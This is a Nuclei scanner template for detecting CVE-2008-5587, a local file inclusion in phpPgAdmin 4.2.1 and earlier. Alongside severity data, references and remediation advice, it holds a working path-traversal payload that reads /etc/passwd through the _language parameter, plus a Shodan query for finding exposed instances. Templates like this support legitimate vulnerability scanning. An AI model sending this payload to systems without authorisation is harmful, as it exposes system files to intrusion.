id: CVE-2008-5587 info: name: phpPgAdmin <=4.2.1 - Local File Inclusion author: dhiyaneshDK severity: medium description: phpPgAdmin 4.2.1 is vulnerable to local file inclusion in libraries/lib.inc.php when register globals is enabled. Remote attackers can read arbitrary files via a .. (dot dot) in the _language parameter to index.php. remediation: | Upgrade phpPgAdmin to a version higher than 4.2.1 or apply the necessary patches provided by the vendor. reference: - https://www.exploit-db.com/exploits/7363 - https://nvd.nist.gov/vuln/detail/CVE-2008-5587 - http://lists.opensuse.org/opensuse-security-announce/2009-02/msg00002.html - http://lists.opensuse.org/opensuse-updates/2012-04/msg00033.html - http://securityreason.com/securityalert/4737 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N cvss-score: 4.3 cve-id: CVE-2008-5587 cwe-id: CWE-22 epss-score: 0.02331 epss-percentile: 0.88566 cpe: cpe:2.3:a:phppgadmin:phppgadmin:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: phppgadmin product: phppgadmin shodan-query: http.title:"phpPgAdmin" tags: cve,cve2008,lfi,phppgadmin,edb http: - method: GET path: - '{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00' matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" - type: status status: - 200 # digest: 4b0a0048304602210091a44ab7f322c457a971b38ee8af7d5ad405221045a9a3b9587ed918c7be77f602210087b969a1bed5859e14e5d519c5fe8b063ad508ee4fefee7fcea8eafc70818c82:922c64590222798bb761d5b6d8e72950